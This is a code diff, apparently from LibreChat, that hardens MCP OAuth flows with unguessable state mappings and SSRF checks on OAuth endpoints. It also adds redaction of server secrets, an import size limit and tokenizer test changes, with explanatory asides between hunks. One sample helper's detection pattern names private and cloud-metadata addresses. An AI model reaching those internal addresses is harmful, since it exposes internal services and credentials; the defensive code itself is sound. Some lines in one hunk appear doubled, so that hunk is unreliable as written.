logger.debug(`[MCPOAuth] metadata for "${serverName}": ${JSON.stringify(metadata)}`);
+const redirectUri = this.getDefaultRedirectUri(serverName);
const clientInfo: OAuthClientInformation = {
client_id: config.client_id,
client_secret: config.client_secret,
-redirect_uris: [config.redirect_uri || this.getDefaultRedirectUri(serverName)],
+redirect_uris: [redirectUri],
scope: config.scope,
token_endpoint_auth_method: tokenEndpointAuthMethod,
};
@@ -402,12 +443,12 @@ export class MCPOAuthHandler {
const { authorizationUrl, codeVerifier } = await startAuthorization(serverUrl, {
metadata: metadata as unknown as SDKOAuthMetadata,
clientInformation: clientInfo,
-redirectUrl: clientInfo.redirect_uris?.[0] || this.getDefaultRedirectUri(serverName),
+redirectUrl: redirectUri,
scope: config.scope,
});
-/** Add state parameter with flowId to the authorization URL */
-authorizationUrl.searchParams.set('state', flowId);
+/** Add cryptographic state parameter to the authorization URL */
+authorizationUrl.searchParams.set('state', state);
logger.debug(`[MCPOAuth] Added state parameter to authorization URL`);
const flowMetadata: MCPOAuthFlowMetadata = {
@@ -442,8 +483,7 @@ export class MCPOAuthHandler {
`[MCPOAuth] OAuth metadata discovered, auth server URL: ${sanitizeUrlForLogging(authServerUrl)}`,
);
-/** Dynamic client registration based on the discovered metadata */
-const redirectUri = config?.redirect_uri || this.getDefaultRedirectUri(serverName);
+const redirectUri = this.getDefaultRedirectUri(serverName);
logger.debug(`[MCPOAuth] Registering OAuth client with redirect URI: ${redirectUri}`);
const clientInfo = await this.registerOAuthClient(
@@ -485,8 +525,8 @@ export class MCPOAuthHandler {
`[MCPOAuth] Authorization URL: ${sanitizeUrlForLogging(authorizationUrl.toString())}`,
);
-/** Add state parameter with flowId to the authorization URL */
-authorizationUrl.searchParams.set('state', flowId);
+/** Add cryptographic state parameter to the authorization URL */
+authorizationUrl.searchParams.set('state', state);
logger.debug(`[MCPOAuth] Added state parameter to authorization URL`);
if (resourceMetadata?.resource != null && resourceMetadata.resource) {
@@ -652,6 +692,62 @@ export class MCPOAuthHandler {
return randomBytes(32).toString('base64url');
}
/** Validates an OAuth URL is not targeting a private/internal address */
private static async validateOAuthUrl(url: string, fieldName: string): Promise<void> {
let hostname: string;
try {
hostname = new URL(url).hostname;
} catch {
throw new Error(`Invalid OAuth ${fieldName}: ${sanitizeUrlForLogging(url)}`);
}
if (isSSRFTarget(hostname)) {
throw new Error(`OAuth ${fieldName} targets a blocked address`);
}
if (await resolveHostnameSSRF(hostname)) {
throw new Error(`OAuth ${fieldName} resolves to a private IP address`);
}
}
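The real `isSSRFTarget`/`resolveHostnameSSRF` helpers come from `~/auth` and are not shown in this diff. As a rough stand-in for the literal-address portion of such a check (an assumption: only IPv4 literals and localhost names are handled here, while the real helpers also resolve DNS and cover IPv6):

```typescript
/**
 * Rough stand-in for an SSRF hostname check: flags localhost names and IPv4
 * literals in loopback/private/link-local ranges. Illustration only; the
 * real helpers additionally resolve DNS and handle IPv6.
 */
function looksLikeSSRFTarget(hostname: string): boolean {
  const lower = hostname.toLowerCase();
  if (lower === 'localhost' || lower.endsWith('.localhost')) {
    return true;
  }
  const m = lower.match(/^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/);
  if (!m) {
    return false; // not an IPv4 literal; DNS resolution would be needed
  }
  const [a, b] = [Number(m[1]), Number(m[2])];
  return (
    a === 127 || // loopback 127.0.0.0/8
    a === 10 || // private 10.0.0.0/8
    (a === 172 && b >= 16 && b <= 31) || // private 172.16.0.0/12
    (a === 192 && b === 168) || // private 192.168.0.0/16
    (a === 169 && b === 254) // link-local, incl. cloud metadata 169.254.169.254
  );
}

console.log(looksLikeSSRFTarget('169.254.169.254')); // true
console.log(looksLikeSSRFTarget('auth.example.com')); // false
```

Validating both the URL literal and its DNS resolution (as `validateOAuthUrl` does) is important: an attacker-controlled discovery document could otherwise point OAuth endpoints at internal services.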
private static readonly STATE_MAP_TYPE = 'mcp_oauth_state';
/**
* Stores a mapping from the opaque OAuth state parameter to the flowId.
* This allows the callback to resolve the flowId from an unguessable state
* value, preventing attackers from forging callback requests.
*/
static async storeStateMapping(
state: string,
flowId: string,
flowManager: FlowStateManager<MCPOAuthTokens | null>,
): Promise<void> {
await flowManager.initFlow(state, this.STATE_MAP_TYPE, { flowId });
}
/**
* Resolves an opaque OAuth state parameter back to the original flowId.
* Returns null if the state is not found (expired or never stored).
*/
static async resolveStateToFlowId(
state: string,
flowManager: FlowStateManager<MCPOAuthTokens | null>,
): Promise<string | null> {
const mapping = await flowManager.getFlowState(state, this.STATE_MAP_TYPE);
return (mapping?.metadata?.flowId as string) ?? null;
}
/**
* Deletes an orphaned state mapping when a flow is replaced.
* Prevents old authorization URLs from resolving after a flow restart.
*/
static async deleteStateMapping(
state: string,
flowManager: FlowStateManager<MCPOAuthTokens | null>,
): Promise<void> {
await flowManager.deleteFlow(state, this.STATE_MAP_TYPE);
}
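The store/resolve/delete contract above can be sketched in memory, with a plain `Map` standing in for the `FlowStateManager` persistence (an assumption: the real store also applies flow TTLs, which this sketch omits):

```typescript
// In-memory sketch of the opaque-state mapping contract. A Map stands in
// for the FlowStateManager store keyed under the 'mcp_oauth_state' type.
const stateToFlow = new Map<string, string>();

function storeStateMapping(state: string, flowId: string): void {
  stateToFlow.set(state, flowId);
}

function resolveStateToFlowId(state: string): string | null {
  return stateToFlow.get(state) ?? null;
}

function deleteStateMapping(state: string): void {
  stateToFlow.delete(state);
}

// The state value is unguessable (randomBytes(32) in the real code), so a
// forged callback cannot resolve to any flow.
storeStateMapping('opaque-random-state', 'user-123:server1');
console.log(resolveStateToFlowId('opaque-random-state')); // 'user-123:server1'
console.log(resolveStateToFlowId('forged-state')); // null
deleteStateMapping('opaque-random-state');
console.log(resolveStateToFlowId('opaque-random-state')); // null
```

Indirecting through an unguessable state (rather than putting the `flowId` in the URL, as the replaced code did) is what makes the callback unforgeable.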
/**
* Gets the default redirect URI for a server
*/
@@ -725,19 +821,20 @@ export class MCPOAuthHandler {
scope: metadata.clientInfo.scope,
});
-/** Use the stored client information and metadata to determine the token URL */
let tokenUrl: string;
let authMethods: string[] | undefined;
if (config?.token_url) {
await this.validateOAuthUrl(config.token_url, 'token_url');
tokenUrl = config.token_url; tokenUrl = config.token_url;
authMethods = config.token_endpoint_auth_methods_supported; authMethods = config.token_endpoint_auth_methods_supported;
} else if (!metadata.serverUrl) { } else if (!metadata.serverUrl) {
throw new Error('No token URL available for refresh'); throw new Error('No token URL available for refresh');
} else { } else {
/** Auto-discover OAuth configuration for refresh */ /** Auto-discover OAuth configuration for refresh */
const oauthMetadata = await discoverAuthorizationServerMetadata(metadata.serverUrl, { const serverUrl = new URL(metadata.serverUrl);
fetchFn: this.createOAuthFetch(oauthHeaders), const fetchFn = this.createOAuthFetch(oauthHeaders);
}); const oauthMetadata = await this.discoverWithOriginFallback(serverUrl, fetchFn);
if (!oauthMetadata) { if (!oauthMetadata) {
/** /**
* No metadata discovered - use fallback /token endpoint. * No metadata discovered - use fallback /token endpoint.
@ -754,6 +851,7 @@ export class MCPOAuthHandler {
tokenUrl = oauthMetadata.token_endpoint; tokenUrl = oauthMetadata.token_endpoint;
authMethods = oauthMetadata.token_endpoint_auth_methods_supported; authMethods = oauthMetadata.token_endpoint_auth_methods_supported;
} }
await this.validateOAuthUrl(tokenUrl, 'token_url');
} }
     const body = new URLSearchParams({
@@ -827,10 +925,10 @@ export class MCPOAuthHandler {
       return this.processRefreshResponse(tokens, metadata.serverName, 'stored client info');
     }

-    // Fallback: If we have pre-configured OAuth settings, use them
     if (config?.token_url && config?.client_id) {
       logger.debug(`[MCPOAuth] Using pre-configured OAuth settings for token refresh`);
+      await this.validateOAuthUrl(config.token_url, 'token_url');
       const tokenUrl = new URL(config.token_url);

       const body = new URLSearchParams({
@@ -911,9 +1009,9 @@ export class MCPOAuthHandler {
     }

     /** Auto-discover OAuth configuration for refresh */
-    const oauthMetadata = await discoverAuthorizationServerMetadata(metadata.serverUrl, {
-      fetchFn: this.createOAuthFetch(oauthHeaders),
-    });
+    const serverUrl = new URL(metadata.serverUrl);
+    const fetchFn = this.createOAuthFetch(oauthHeaders);
+    const oauthMetadata = await this.discoverWithOriginFallback(serverUrl, fetchFn);

     let tokenUrl: URL;
     if (!oauthMetadata?.token_endpoint) {
@@ -928,6 +1026,7 @@ export class MCPOAuthHandler {
     } else {
       tokenUrl = new URL(oauthMetadata.token_endpoint);
     }
+    await this.validateOAuthUrl(tokenUrl.href, 'token_url');

     const body = new URLSearchParams({
       grant_type: 'refresh_token',
@@ -977,7 +1076,9 @@ export class MCPOAuthHandler {
     },
     oauthHeaders: Record<string, string> = {},
   ): Promise<void> {
-    // build the revoke URL, falling back to the server URL + /revoke if no revocation endpoint is provided
+    if (metadata.revocationEndpoint != null) {
+      await this.validateOAuthUrl(metadata.revocationEndpoint, 'revocation_endpoint');
+    }
     const revokeUrl: URL =
       metadata.revocationEndpoint != null
         ? new URL(metadata.revocationEndpoint)


@@ -4,6 +4,15 @@ import type { TokenMethods, IToken } from '@librechat/data-schemas';
 import type { MCPOAuthTokens, ExtendedOAuthTokens, OAuthMetadata } from './types';
 import { isSystemUserId } from '~/mcp/enum';

+export class ReauthenticationRequiredError extends Error {
+  constructor(serverName: string, reason: 'expired' | 'missing') {
+    super(
+      `Re-authentication required for "${serverName}": access token ${reason} and no refresh token available`,
+    );
+    this.name = 'ReauthenticationRequiredError';
+  }
+}
+
 interface StoreTokensParams {
   userId: string;
   serverName: string;
@@ -27,7 +36,12 @@ interface GetTokensParams {
   findToken: TokenMethods['findToken'];
   refreshTokens?: (
     refreshToken: string,
-    metadata: { userId: string; serverName: string; identifier: string },
+    metadata: {
+      userId: string;
+      serverName: string;
+      identifier: string;
+      clientInfo?: OAuthClientInformation;
+    },
   ) => Promise<MCPOAuthTokens>;
   createToken?: TokenMethods['createToken'];
   updateToken?: TokenMethods['updateToken'];
@@ -69,46 +83,40 @@ export class MCPTokenStorage {
       `${logPrefix} Token expires_in: ${'expires_in' in tokens ? tokens.expires_in : 'N/A'}, expires_at: ${'expires_at' in tokens ? tokens.expires_at : 'N/A'}`,
     );

-    // Handle both expires_in and expires_at formats
+    const defaultTTL = 365 * 24 * 60 * 60;
     let accessTokenExpiry: Date;
+    let expiresInSeconds: number;

     if ('expires_at' in tokens && tokens.expires_at) {
       /** MCPOAuthTokens format - already has calculated expiry */
       logger.debug(`${logPrefix} Using expires_at: ${tokens.expires_at}`);
       accessTokenExpiry = new Date(tokens.expires_at);
+      expiresInSeconds = Math.floor((accessTokenExpiry.getTime() - Date.now()) / 1000);
     } else if (tokens.expires_in) {
-      /** Standard OAuthTokens format - calculate expiry */
+      /** Standard OAuthTokens format - use expires_in directly to avoid lossy Date round-trip */
       logger.debug(`${logPrefix} Using expires_in: ${tokens.expires_in}`);
+      expiresInSeconds = tokens.expires_in;
       accessTokenExpiry = new Date(Date.now() + tokens.expires_in * 1000);
     } else {
-      /** No expiry provided - default to 1 year */
       logger.debug(`${logPrefix} No expiry provided, using default`);
-      accessTokenExpiry = new Date(Date.now() + 365 * 24 * 60 * 60 * 1000);
+      expiresInSeconds = defaultTTL;
+      accessTokenExpiry = new Date(Date.now() + defaultTTL * 1000);
     }

     logger.debug(`${logPrefix} Calculated expiry date: ${accessTokenExpiry.toISOString()}`);
-    logger.debug(
-      `${logPrefix} Date object: ${JSON.stringify({
-        time: accessTokenExpiry.getTime(),
-        valid: !isNaN(accessTokenExpiry.getTime()),
-        iso: accessTokenExpiry.toISOString(),
-      })}`,
-    );

-    // Ensure the date is valid before passing to createToken
     if (isNaN(accessTokenExpiry.getTime())) {
       logger.error(`${logPrefix} Invalid expiry date calculated, using default`);
-      accessTokenExpiry = new Date(Date.now() + 365 * 24 * 60 * 60 * 1000);
+      accessTokenExpiry = new Date(Date.now() + defaultTTL * 1000);
+      expiresInSeconds = defaultTTL;
     }

-    // Calculate expiresIn (seconds from now)
-    const expiresIn = Math.floor((accessTokenExpiry.getTime() - Date.now()) / 1000);
-
     const accessTokenData = {
       userId,
       type: 'mcp_oauth',
       identifier,
       token: encryptedAccessToken,
-      expiresIn: expiresIn > 0 ? expiresIn : 365 * 24 * 60 * 60, // Default to 1 year if negative
+      expiresIn: expiresInSeconds > 0 ? expiresInSeconds : defaultTTL,
     };

     // Check if token already exists and update if it does
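The expiry normalization above (prefer `expires_at`, then `expires_in`, then a one-year default) can be distilled into a small pure helper. This is a sketch, not the storage code itself; in particular it assumes `expires_at` is in milliseconds since the epoch, matching the `new Date(tokens.expires_at)` call in the diff:

```typescript
const DEFAULT_TTL_SECONDS = 365 * 24 * 60 * 60; // 1 year

interface TokenExpiryInput {
  expires_at?: number; // absolute expiry, assumed ms since epoch
  expires_in?: number; // relative expiry, seconds
}

// Returns the TTL in seconds to store alongside the token.
function resolveExpiresInSeconds(tokens: TokenExpiryInput, now: number = Date.now()): number {
  if (tokens.expires_at) {
    // Absolute timestamp: derive the remaining lifetime.
    const remaining = Math.floor((tokens.expires_at - now) / 1000);
    return remaining > 0 ? remaining : DEFAULT_TTL_SECONDS;
  }
  if (tokens.expires_in) {
    // Relative lifetime: use it directly, avoiding a lossy Date round-trip.
    return tokens.expires_in;
  }
  return DEFAULT_TTL_SECONDS;
}
```

Passing `expires_in` through unchanged is the point of the change in the diff: converting to a `Date` and back to seconds can drop up to a second per round-trip.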
@@ -273,10 +281,11 @@ export class MCPTokenStorage {
     });

     if (!refreshTokenData) {
+      const reason = isMissing ? 'missing' : 'expired';
       logger.info(
-        `${logPrefix} Access token ${isMissing ? 'missing' : 'expired'} and no refresh token available`,
+        `${logPrefix} Access token ${reason} and no refresh token available — re-authentication required`,
       );
-      return null;
+      throw new ReauthenticationRequiredError(serverName, reason);
     }

     if (!refreshTokens) {
@@ -395,6 +404,9 @@ export class MCPTokenStorage {
       logger.debug(`${logPrefix} Loaded existing OAuth tokens from storage`);
       return tokens;
     } catch (error) {
+      if (error instanceof ReauthenticationRequiredError) {
+        throw error;
+      }
       logger.error(`${logPrefix} Failed to retrieve tokens`, error);
       return null;
     }
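The `instanceof` rethrow above follows a common pattern: a typed error subclass lets a broad catch degrade incidental failures to `null` while propagating the one condition the caller must act on. A minimal self-contained sketch of that shape (the `loadTokens` wrapper is hypothetical, not the actual `MCPTokenStorage` method):

```typescript
class ReauthenticationRequiredError extends Error {
  constructor(serverName: string, reason: 'expired' | 'missing') {
    super(
      `Re-authentication required for "${serverName}": access token ${reason} and no refresh token available`,
    );
    this.name = 'ReauthenticationRequiredError';
  }
}

// Hypothetical token loader illustrating the catch/rethrow shape.
async function loadTokens(fetchTokens: () => Promise<string>): Promise<string | null> {
  try {
    return await fetchTokens();
  } catch (error) {
    if (error instanceof ReauthenticationRequiredError) {
      throw error; // caller must prompt the user to re-authenticate
    }
    return null; // any other failure degrades to "no tokens"
  }
}
```

Without the `instanceof` guard, the generic `catch` would swallow the signal and callers could never distinguish "needs re-auth" from "transient storage error".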


@@ -88,6 +88,7 @@ export interface MCPOAuthFlowMetadata extends FlowMetadata {
   clientInfo?: OAuthClientInformation;
   metadata?: OAuthMetadata;
   resourceMetadata?: OAuthProtectedResourceMetadata;
+  authorizationUrl?: string;
 }

 export interface MCPOAuthTokens extends OAuthTokens {


@@ -17,20 +17,20 @@
 import * as net from 'net';
 import * as http from 'http';
+import { Keyv } from 'keyv';
 import { Agent } from 'undici';
+import { Types } from 'mongoose';
 import { randomUUID } from 'crypto';
 import { McpServer } from '@modelcontextprotocol/sdk/server/mcp.js';
 import { StreamableHTTPServerTransport } from '@modelcontextprotocol/sdk/server/streamableHttp.js';
-import { Keyv } from 'keyv';
-import { Types } from 'mongoose';
 import type { IUser } from '@librechat/data-schemas';
 import type { Socket } from 'net';
 import type * as t from '~/mcp/types';
+import { MCPInspectionFailedError } from '~/mcp/errors';
 import { registryStatusCache } from '~/mcp/registry/cache/RegistryStatusCache';
 import { MCPServersInitializer } from '~/mcp/registry/MCPServersInitializer';
 import { MCPServersRegistry } from '~/mcp/registry/MCPServersRegistry';
 import { ConnectionsRepository } from '~/mcp/ConnectionsRepository';
-import { MCPInspectionFailedError } from '~/mcp/errors';
 import { FlowStateManager } from '~/flow/manager';
 import { MCPConnection } from '~/mcp/connection';
 import { MCPManager } from '~/mcp/MCPManager';


@@ -1456,4 +1456,102 @@ describe('ServerConfigsDB', () => {
      expect(retrieved?.apiKey?.key).toBeUndefined();
    });
  });
describe('DB layer returns decrypted secrets (redaction is at controller layer)', () => {
it('should return decrypted apiKey.key to VIEW-only user via get()', async () => {
const config: ParsedServerConfig = {
type: 'sse',
url: 'https://example.com/mcp',
title: 'Secret API Key Server',
apiKey: {
source: 'admin',
authorization_type: 'bearer',
key: 'admin-secret-api-key',
},
};
const created = await serverConfigsDB.add('temp-name', config, userId);
const role = await mongoose.models.AccessRole.findOne({
accessRoleId: AccessRoleIds.MCPSERVER_VIEWER,
});
await mongoose.models.AclEntry.create({
principalType: PrincipalType.USER,
principalModel: PrincipalModel.USER,
principalId: new mongoose.Types.ObjectId(userId2),
resourceType: ResourceType.MCPSERVER,
resourceId: new mongoose.Types.ObjectId(created.config.dbId!),
permBits: PermissionBits.VIEW,
roleId: role!._id,
grantedBy: new mongoose.Types.ObjectId(userId),
});
const result = await serverConfigsDB.get(created.serverName, userId2);
expect(result).toBeDefined();
expect(result?.apiKey?.key).toBe('admin-secret-api-key');
});
it('should return decrypted oauth.client_secret to VIEW-only user via get()', async () => {
const config = createSSEConfig('Secret OAuth Server', 'Test', {
client_id: 'my-client-id',
client_secret: 'admin-oauth-secret',
});
const created = await serverConfigsDB.add('temp-name', config, userId);
const role = await mongoose.models.AccessRole.findOne({
accessRoleId: AccessRoleIds.MCPSERVER_VIEWER,
});
await mongoose.models.AclEntry.create({
principalType: PrincipalType.USER,
principalModel: PrincipalModel.USER,
principalId: new mongoose.Types.ObjectId(userId2),
resourceType: ResourceType.MCPSERVER,
resourceId: new mongoose.Types.ObjectId(created.config.dbId!),
permBits: PermissionBits.VIEW,
roleId: role!._id,
grantedBy: new mongoose.Types.ObjectId(userId),
});
const result = await serverConfigsDB.get(created.serverName, userId2);
expect(result).toBeDefined();
expect(result?.oauth?.client_secret).toBe('admin-oauth-secret');
});
it('should return decrypted secrets to VIEW-only user via getAll()', async () => {
const config: ParsedServerConfig = {
type: 'sse',
url: 'https://example.com/mcp',
title: 'Shared Secret Server',
apiKey: {
source: 'admin',
authorization_type: 'bearer',
key: 'shared-api-key',
},
oauth: {
client_id: 'shared-client',
client_secret: 'shared-oauth-secret',
},
};
const created = await serverConfigsDB.add('temp-name', config, userId);
const role = await mongoose.models.AccessRole.findOne({
accessRoleId: AccessRoleIds.MCPSERVER_VIEWER,
});
await mongoose.models.AclEntry.create({
principalType: PrincipalType.USER,
principalModel: PrincipalModel.USER,
principalId: new mongoose.Types.ObjectId(userId2),
resourceType: ResourceType.MCPSERVER,
resourceId: new mongoose.Types.ObjectId(created.config.dbId!),
permBits: PermissionBits.VIEW,
roleId: role!._id,
grantedBy: new mongoose.Types.ObjectId(userId),
});
const result = await serverConfigsDB.getAll(userId2);
const serverConfig = result[created.serverName];
expect(serverConfig).toBeDefined();
expect(serverConfig?.apiKey?.key).toBe('shared-api-key');
expect(serverConfig?.oauth?.client_secret).toBe('shared-oauth-secret');
});
});
});


@@ -1,6 +1,66 @@
 import { Constants } from 'librechat-data-provider';
+import type { ParsedServerConfig } from '~/mcp/types';

 export const mcpToolPattern = new RegExp(`^.+${Constants.mcp_delimiter}.+$`);
/**
* Allowlist-based sanitization for API responses. Only explicitly listed fields are included;
* new fields added to ParsedServerConfig are excluded by default until allowlisted here.
*
* URLs are returned as-is: DB-stored configs reject ${VAR} patterns at validation time
* (MCPServerUserInputSchema), and YAML configs are admin-managed. Env variable resolution
* is handled at the schema/input boundary, not the output boundary.
*/
export function redactServerSecrets(config: ParsedServerConfig): Partial<ParsedServerConfig> {
const safe: Partial<ParsedServerConfig> = {
type: config.type,
url: config.url,
title: config.title,
description: config.description,
iconPath: config.iconPath,
chatMenu: config.chatMenu,
requiresOAuth: config.requiresOAuth,
capabilities: config.capabilities,
tools: config.tools,
toolFunctions: config.toolFunctions,
initDuration: config.initDuration,
updatedAt: config.updatedAt,
dbId: config.dbId,
consumeOnly: config.consumeOnly,
inspectionFailed: config.inspectionFailed,
customUserVars: config.customUserVars,
serverInstructions: config.serverInstructions,
};
if (config.apiKey) {
safe.apiKey = {
source: config.apiKey.source,
authorization_type: config.apiKey.authorization_type,
...(config.apiKey.custom_header && { custom_header: config.apiKey.custom_header }),
};
}
if (config.oauth) {
const { client_secret: _secret, ...safeOAuth } = config.oauth;
safe.oauth = safeOAuth;
}
return Object.fromEntries(
Object.entries(safe).filter(([, v]) => v !== undefined),
) as Partial<ParsedServerConfig>;
}
/** Applies allowlist-based sanitization to a map of server configs. */
export function redactAllServerSecrets(
configs: Record<string, ParsedServerConfig>,
): Record<string, Partial<ParsedServerConfig>> {
const result: Record<string, Partial<ParsedServerConfig>> = {};
for (const [key, config] of Object.entries(configs)) {
result[key] = redactServerSecrets(config);
}
return result;
}
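The allowlist approach above — copy explicitly named fields, destructure secrets out of nested objects, then drop `undefined` entries — generalizes beyond this config type. A self-contained sketch with a simplified, hypothetical config shape (not the real `ParsedServerConfig`):

```typescript
interface DemoConfig {
  url?: string;
  title?: string;
  oauth?: { client_id: string; client_secret?: string };
  internalFlag?: boolean; // not allowlisted: must never leave the server
}

function redactDemo(config: DemoConfig): Partial<DemoConfig> {
  // Allowlist: only fields named here can appear in the output.
  const safe: Partial<DemoConfig> = {
    url: config.url,
    title: config.title,
  };
  if (config.oauth) {
    // Destructuring removes client_secret while keeping everything else.
    const { client_secret: _secret, ...safeOAuth } = config.oauth;
    safe.oauth = safeOAuth;
  }
  // Drop undefined entries so absent fields stay absent in JSON output.
  return Object.fromEntries(
    Object.entries(safe).filter(([, v]) => v !== undefined),
  ) as Partial<DemoConfig>;
}
```

The key property, as the comment in the diff notes, is fail-closed behavior: a field added to the config type later is excluded from API responses until someone deliberately adds it to the allowlist.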
/**
 * Normalizes a server name to match the pattern ^[a-zA-Z0-9_.-]+$
 * This is required for Azure OpenAI models with Tool Calling


@ -0,0 +1,76 @@
jest.mock('@librechat/data-schemas', () => ({
logger: { info: jest.fn(), warn: jest.fn(), error: jest.fn(), debug: jest.fn() },
}));
import { DEFAULT_IMPORT_MAX_FILE_SIZE, resolveImportMaxFileSize } from '../import';
import { logger } from '@librechat/data-schemas';
describe('resolveImportMaxFileSize', () => {
let originalEnv: string | undefined;
beforeEach(() => {
originalEnv = process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES;
jest.clearAllMocks();
});
afterEach(() => {
if (originalEnv !== undefined) {
process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES = originalEnv;
} else {
delete process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES;
}
});
it('returns 262144000 (250 MiB) when env var is not set', () => {
delete process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES;
expect(resolveImportMaxFileSize()).toBe(262144000);
expect(DEFAULT_IMPORT_MAX_FILE_SIZE).toBe(262144000);
});
it('returns default when env var is empty string', () => {
process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES = '';
expect(resolveImportMaxFileSize()).toBe(DEFAULT_IMPORT_MAX_FILE_SIZE);
});
it('respects a custom numeric value', () => {
process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES = '5242880';
expect(resolveImportMaxFileSize()).toBe(5242880);
});
it('parses string env var to number', () => {
process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES = '1048576';
expect(resolveImportMaxFileSize()).toBe(1048576);
});
it('falls back to default and warns for non-numeric string', () => {
process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES = 'abc';
expect(resolveImportMaxFileSize()).toBe(DEFAULT_IMPORT_MAX_FILE_SIZE);
expect(logger.warn).toHaveBeenCalledWith(
expect.stringContaining('Invalid CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES'),
);
});
it('falls back to default and warns for negative values', () => {
process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES = '-100';
expect(resolveImportMaxFileSize()).toBe(DEFAULT_IMPORT_MAX_FILE_SIZE);
expect(logger.warn).toHaveBeenCalledWith(
expect.stringContaining('Invalid CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES'),
);
});
it('falls back to default and warns for zero', () => {
process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES = '0';
expect(resolveImportMaxFileSize()).toBe(DEFAULT_IMPORT_MAX_FILE_SIZE);
expect(logger.warn).toHaveBeenCalledWith(
expect.stringContaining('Invalid CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES'),
);
});
it('falls back to default and warns for Infinity', () => {
process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES = 'Infinity';
expect(resolveImportMaxFileSize()).toBe(DEFAULT_IMPORT_MAX_FILE_SIZE);
expect(logger.warn).toHaveBeenCalledWith(
expect.stringContaining('Invalid CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES'),
);
});
});


@ -0,0 +1,20 @@
import { logger } from '@librechat/data-schemas';
/** 250 MiB — default max file size for conversation imports */
export const DEFAULT_IMPORT_MAX_FILE_SIZE = 262144000;
/** Resolves the import file-size limit from the env var, falling back to the 250 MiB default */
export function resolveImportMaxFileSize(): number {
const raw = process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES;
if (!raw) {
return DEFAULT_IMPORT_MAX_FILE_SIZE;
}
const parsed = Number(raw);
if (!Number.isFinite(parsed) || parsed <= 0) {
logger.warn(
`[imports] Invalid CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES="${raw}"; using default ${DEFAULT_IMPORT_MAX_FILE_SIZE}`,
);
return DEFAULT_IMPORT_MAX_FILE_SIZE;
}
return parsed;
}
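The validation rule above (finite and strictly positive, everything else falls back) can be exercised in isolation. This sketch inlines the same logic with the raw string injected as a parameter, so it is testable without mutating `process.env` or mocking the logger:

```typescript
const DEFAULT_IMPORT_MAX_FILE_SIZE = 262144000; // 250 MiB

// Same parsing rule as resolveImportMaxFileSize, minus env access and logging.
function resolveLimit(raw: string | undefined): number {
  if (!raw) {
    return DEFAULT_IMPORT_MAX_FILE_SIZE;
  }
  const parsed = Number(raw);
  if (!Number.isFinite(parsed) || parsed <= 0) {
    // Invalid values fall back rather than throw, so a typo in the
    // env var cannot take down conversation imports entirely.
    return DEFAULT_IMPORT_MAX_FILE_SIZE;
  }
  return parsed;
}
```

Note that `Number.isFinite` rejects both `NaN` (e.g. `"abc"`) and `Infinity` in one check, which is why the original does not need separate branches for them.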


@@ -6,6 +6,7 @@ export * from './email';
 export * from './env';
 export * from './events';
 export * from './files';
+export * from './import';
 export * from './generators';
 export * from './graph';
 export * from './path';
@@ -19,7 +20,6 @@ export * from './promise';
 export * from './sanitizeTitle';
 export * from './tempChatRetention';
 export * from './text';
-export { default as Tokenizer, countTokens } from './tokenizer';
 export * from './yaml';
 export * from './http';
 export * from './tokens';


@@ -65,7 +65,7 @@ const createRealTokenCounter = () => {
   let callCount = 0;
   const tokenCountFn = (text: string): number => {
     callCount++;
-    return Tokenizer.getTokenCount(text, 'cl100k_base');
+    return Tokenizer.getTokenCount(text, 'o200k_base');
   };
   return {
@@ -590,9 +590,9 @@ describe('processTextWithTokenLimit', () => {
     });
   });

-  describe('direct comparison with REAL tiktoken tokenizer', () => {
-    beforeEach(() => {
-      Tokenizer.freeAndResetAllEncoders();
+  describe('direct comparison with REAL ai-tokenizer', () => {
+    beforeAll(async () => {
+      await Tokenizer.initEncoding('o200k_base');
     });

     it('should produce valid truncation with real tokenizer', async () => {
@@ -611,7 +611,7 @@ describe('processTextWithTokenLimit', () => {
       expect(result.text.length).toBeLessThan(text.length);
     });

-    it('should use fewer tiktoken calls than old implementation (realistic text)', async () => {
+    it('should use fewer tokenizer calls than old implementation (realistic text)', async () => {
       const oldCounter = createRealTokenCounter();
       const newCounter = createRealTokenCounter();
       const text = createRealisticText(15000);
@@ -623,8 +623,6 @@ describe('processTextWithTokenLimit', () => {
         tokenCountFn: oldCounter.tokenCountFn,
       });

-      Tokenizer.freeAndResetAllEncoders();
-
       await processTextWithTokenLimit({
         text,
         tokenLimit,
@@ -634,17 +632,17 @@ describe('processTextWithTokenLimit', () => {
       const oldCalls = oldCounter.getCallCount();
       const newCalls = newCounter.getCallCount();

-      console.log(`[Real tiktoken ~15k tokens] OLD: ${oldCalls} calls, NEW: ${newCalls} calls`);
-      console.log(`[Real tiktoken] Reduction: ${((1 - newCalls / oldCalls) * 100).toFixed(1)}%`);
+      console.log(`[Real tokenizer ~15k tokens] OLD: ${oldCalls} calls, NEW: ${newCalls} calls`);
+      console.log(`[Real tokenizer] Reduction: ${((1 - newCalls / oldCalls) * 100).toFixed(1)}%`);

       expect(newCalls).toBeLessThan(oldCalls);
     });

-    it('should handle the reported user scenario with real tokenizer (~120k tokens)', async () => {
+    it('should handle large text with real tokenizer (~20k tokens)', async () => {
       const oldCounter = createRealTokenCounter();
       const newCounter = createRealTokenCounter();
-      const text = createRealisticText(120000);
-      const tokenLimit = 100000;
+      const text = createRealisticText(20000);
+      const tokenLimit = 15000;

       const startOld = performance.now();
       await processTextWithTokenLimitOLD({
@@ -654,8 +652,6 @@ describe('processTextWithTokenLimit', () => {
       });
       const timeOld = performance.now() - startOld;

-      Tokenizer.freeAndResetAllEncoders();
-
       const startNew = performance.now();
       const result = await processTextWithTokenLimit({
         text,
@@ -667,9 +663,9 @@ describe('processTextWithTokenLimit', () => {
       const oldCalls = oldCounter.getCallCount();
